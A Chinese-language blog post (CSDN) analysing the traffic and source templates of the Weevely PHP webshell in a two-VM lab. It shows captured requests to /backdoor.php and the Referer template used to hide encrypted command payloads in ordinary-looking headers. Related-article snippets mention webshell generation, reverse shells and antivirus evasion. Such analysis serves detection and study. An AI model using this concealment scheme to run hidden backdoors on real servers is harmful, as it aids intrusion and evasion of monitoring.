Weevely使用及源码分析(二)

最新推荐文章于 2022-05-23 21:49:48 发布
最新推荐文章于 2022-05-23 21:49:48 发布
阅读量2.8k 收藏 1
点赞数 3
分类专栏: Weevely 文章标签: php wireshark 源码 weevely 后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yaofeiNO1/article/details/54409496
版权

1. 定义(术语、名词解释)

   客户端:运行Weevely进程的计算机。
   服务端:存有PHP木马的服务器。

2. 协议交互流程

   在客户端,Weevely每执行一条命令就通过HTTP协议发出一条GET/POST请求;在服务端,木马针对每条GET/POST请求作出响应,产生一条响应包。

3. 数据包及源码分析

   通过对源代码进行走读以及wireshark进行抓包分析,可以看出Weevely主要生成的php后门文件主要有三种模板:stegaref_php.tpl,legacycookie_php.tpl,stegaref_php_debug.tpl。其中stegaref_php.tpl与stegaref_php_debug.tpl两种php模板类似,主要特点是返回的response_body中的标签stegaref_php.tpl为<连接密码md5加密前八位>标签,stegaref_php_debug.tpl为:<连接密码md5加密前八位+DEBUG>标签,同时响应体中的内容stegaref_php_debug.tpl模板把主要的有用数据字段全都显示出来了,主要用于前期debug使用,所以本文档主要分析了stegaref_php.tpl和legacycookie_php.tpl两种使用模板。

3.1 stegaref_php.tpl模板

   以ip为136的kali虚拟机为客户端对含有后门文件的ip为137的kali虚拟机作为服务器进行远程连接。连接成功后在客户端命令行中输入命令whoami查看回显内容。通过Wireshark我们抓取到了两个TCP数据流。分别为:

3.1.1 请求包

数据包

GET /backdoor.php HTTP/1.1
Accept-Encoding: identity
Accept-Language: uk-UA,mi;q=0.5,mt;q=0.7,mk;q=0.8
Host: 192.168.182.137
Accept: text/html,text/plain;0.9,*/*
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1
Connection: close
Referer: http://www.google.bt/url?sa=t&rct=j&q=168.182.137&source=web&cd=799&ved=bd6Tfh__3&url=168.182&ei=z5HrNlsxt6GOIdThqz-xn9&usg=_WO2gRIcnxgee6zgNBv-_H_-rGFUhmIHND

分析

HTTP攻击载荷主要存储于Referer头中,通过Accept-Language头中存储的sessionid和payload的数组偏移量对加密的payload进行提取。|

数据包

GET /backdoor.php HTTP/1.1
Accept-Encoding: identity
Accept-Language: ur-PK,mh;q=0.4
Connection: close
Accept: text/html,application/xml;0.9,*/*
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Host: 192.168.182.137
Cookie: PHPSESSID=fkdt4fv5tkn3q2hnhp10rv65o5
Referer: http://translate.googleusercontent.com/translate_c?depth=1&rurl=translate.google.com&sl=auto&tl=en&usg=hiNRM7PjQ220tyDdwupmXEp1ZrLJkF0aFf

分析

HTTP攻击载荷主要存储于Referer头中,通过Accept-Language头中存储的sessionid和payload的数组偏移量对加密的payload进行提取。

   通过对Weevely源码进行分析,确定数据包格式主要通过7种不同的构造Referer数据报头方法进行对加密的payload进行填充。Referer头格式为:

http://www.google.${ tpl.rand_google_domain() }/url?sa=t&rct=j&q=${ tpl.target_name() }&source=web&cd=${ tpl.rand_number(3) }&ved=${ tpl.payload_chunk(9) }&url=${ tpl.target_name() }&ei=${ tpl.payload_chunk(22) }&usg=${ tpl.payload_chunk(34) }
h
最低0.47元/天 解锁文章
fly小灰灰
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Weevely使用分析(三)
fly小灰灰的专栏
01-30 1770
1 weevely验证机制分析 1.1 分析    当生成的php文件是以stegaref_php.tpl文件为模板时,当我们在连接时的命令行中输入任意命运就可以触发php.py文件中的_check_interpreter()函数,_check_interpreter()函数主要功能是随机生成一个命令,”echo”一个从11111到99999大小的随机整数,然后分别调用channels
Weevely使用分析(一)
fly小灰灰的专栏
01-30 2512
1. 简介 1.1 前言    weevely 是一款使用python编写的webshell工具(集webshell生成和连接于一身),采用C/S模式构建,可以算作是linux下的一款菜刀替代工具(限于PHP),具有很好的隐蔽性,在Linux下具有: 服务器配置审计 后门放置 暴力破解 文件管理 资搜索 网络代理 命令执行 系统信息收集 端口扫描等功能 1.2 测试环境
渗透测试Web利器篇之Weevely介绍、安装以及简单使用
lzp_5257的博客
04-20 3250
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 一、Weevely介绍 Weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,采用c/s模式 构建,可以算作是linux下的一款php菜刀替代工具,具有很好的隐蔽性 在linux上使用时还是很好的,集服务器错误配置审计,后门放置,暴力破解,文件管理,资 搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等功能 下载地址:https://github.com/epinna/weevely3.
Shelly:带Python的简单后门管理器(基于weevely
02-05
雪莉| 使用Python的简单后门管理器(基于weevely) Shelly是使用Python编写的简单工具,其功能是远程访问网站 安装: $ git clone $ cd雪莉$ python3 shell.py 要求 : sudo pip install -r requirements.txt 范例: python3 shell.py -g wp-log -p tegal1337 ______ ____ / __/ / ___ / / __ __ _\ \/ _ / -_/ / / // / /___/_//_\__/_/_/\_, /
weevely3.3.1:Weevely旧版本(3.3.1)
03-25
韦韦利 Weevely是一个命令行Web Shell,可在运行时通过网络动态扩展,旨在用于远程管理和渗透测试。 它提供了一个类似ssh的终端,即使在受限的环境中,也只需将PHP脚本拖放到目标服务器上。 低资占用的代理程序和30多个模块构成了一个可扩展的框架,用于管理Web帐户并发布漏洞利用Web服务器以提升特权并在网络中横向移动。 阅读中的教程和用例。 模块功能: 类SSH终端 在目标上运行SQL控制台透视 代理以目标为中心的HTTP流量 主机配置安全审核 在本地挂载目标文件系统 进行以目标为中心的网络扫描 文件上传下载 生成反向和直接TCP Shell Bruteforce内部服务 管理压缩档案 后门代理 远程代理是一个小PHP脚本,可以在运行时通过网络扩展其功能。 代理代码是多态的,几乎无法被AV检测到,并且流量在HTTP请求中被混淆。 模块开发 Weevely还提供了py
使用weevely获取系统内容.docx
11-30
"使用 Weevely 获取系统内容" Weevely 是一个基于 Web 的后门生成工具,主要用于渗透测试和安全评估。在本文档中,我们将详细介绍如何使用 Weevely 获取系统内容,包括实验准备、实验过程、渗透后 OWASP 系统应用等...
weevely3:武器化的Web外壳
04-05
Weevely-武器化的Web Shell 用法 weevely generate <password> weevely <URL> <password> [cmd] 描述 Weevely是为后开发目的而设计的Web Shell,可以在运行时通过网络对其进行扩展。 将weevely PHP代理上载到目标...
Weevely中PHP加密模块
01-26
分析`weevely_Encryption`代码能提供深入的理解,关于如何在PHP中实现加密功能,以及Weevely如何在实际操作中使用这些技术。这对于提高个人技能或开发类似工具非常有帮助。 总的来说,Weevely的PHP加密模块是其...
suricata规则:Suricata IDS规则使用检测红队渗透恶意行为等,支持检测CobaltStrikeMSFEmpireDNS隧道Weevely菜刀冰蝎反弹shellICMP隧道等
02-06
suricata规则:Suricata IDS规则使用检测红队渗透恶意行为等,支持检测CobaltStrikeMSFEmpireDNS隧道Weevely菜刀冰蝎反弹shellICMP隧道等
入侵检测——weevely
LainWith的博客
08-26 618
这里写目录标题介绍使用环境生成webshell上传webshell连接webshell命令执行编写规则4.0.1版本1.1版本规则参考 介绍 Weevely工具Python语言编写,集生成木马与加连接于一身,相当于Linux中的中国菜刀,但只适用于php网站,已经加入Kali豪华大礼包中。在Kali1.0中集成的低版本V1.1更是功能强大,支持图片与.htaccess两种绕过方式。新版本中将这两种功能阉割掉了,但是生成的木马文件仍然进行了加密处理。 ​ 在实操过程中发现,使用weevely生成的webshe
webshll提权工具包
12-02
webshll提权工具包 NC PR CMD Churrasco 工具全部已经免杀 无后门 webshll提权利器啊
weevely工具使用
淡巴枯的博客
05-23 6510
weevely工具使用 目录一. 关于weevely二. 安装weevely三. 使用weevely四. weevely实战五. 常用模块六. weevely工作原理 声明:本文禁止转载。 仅作网络安全学习交流,切勿用于任何非法用途,否则后果自负。 一. 关于weevely   weevely是一款基于python编写的webshell管理工具,其优点是跨平台,隐蔽性不错,参数随机生成并加密。但缺点是只支持php。   我们可以在普通的一句话木马上传无效的情况下,使用weevley工具生成的一
【渗透测试】VulnHub-IMF: 1
m0_52923241的博客
12-05 525
VulnHub-IMF: 1VulnHub-IMF: 1渗透思路小知识点一、php中使用url传递数组的方法二、sqlmap用到的参数理解三、文件上传提权四、缓冲区溢出常用工具一、weevely:(Linux菜刀)php webshell的安全测试工具二、ltrace:跟踪进程调用库函数的情况工具 VulnHub-IMF: 1渗透思路 参考文章:VulnHub-IMF: 1渗透测试详细流程 参考文章:VulnHub-IMF: 1渗透测试详细流程 渗透思路: 第一步,还是nmap扫ip,端口,开放80端口,访
webshell与反弹shell使用详解
有勇气的牛排博客
07-24 1574
1 介绍 在对linux服务器渗透测试的过程中,我们在getshell得到一个低权限的webshell,由于webshell是非交互式shell,通常要反弹一个交互式的shell,然后提权(不然提权后,还是原来的权限) 2 webshell 获取 2.1 php策略 PHP环境下反弹shell,过去我们通常用phpspy等shell自带反弹即可,这里将其反弹部分代码提取出来,访问即可反弹到指定IP端口一个普通交互shell。 (1)下面利用weevely生成一个php weevely generate 12
Weevely
Nixawk
07-31 1992
Weevely 出现已经有一段时间了, 今天
weevely的webshell分析以及冰蝎/蚁剑免杀-PHP版
yggcwhat
05-02 2057
weevely的webshell分析以及冰蝎/蚁剑免杀-PHP版
weevely(webshell) 用法 命令参数
热门推荐
正在成为 code ape
01-26 2万+
简介 weevely 属于php 的 webshell 工具。但相较于 webacoo ,weevely 的功能更加强大,同时对于webshell的连接设立了密码选项!并且携带了大量的管理模块,为渗透带来了更多的惊喜与便利. 使用步骤: 第一步 kali@root# weevely generate [password] /root/xx.php //生成xx.php的backdoor 密码为p...
【webshell管理工具之二】weevely
redwand的博客
05-09 2464
weevely是kali下集成的一款很好用的专门针对php语言的webshell管理工具,其加密的数据传输和易于操控的特性广受渗透测试们的喜爱。
weevely基本使用
BeatRex的博客
11-22 8656
一、weevely使用 weevely的功能同之前学习过的中国菜刀,但其功能更加丰富且在linux和windows下都可以运行。kali linux环境下已集成weevely。分weevely生成shell文件、weevely连接后台、weevely信息探测、weevely文件操作、weevely审计这几块来学习。 以生成一个名为weevelyshell的shell并上传连接的案例进行学习。 首先...
weevely怎么寻找网站使用的数据库的账号
最新发布
05-30
在连接到 webshell 后门之后,可以使用以下命令查看数据库的配置信息: ``` cat /path/to/web/root/wp-config.php ``` 这个命令适用于 WordPress 网站,如果是其他类型的网站,则需要查找相应的配置文件。 在配置...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值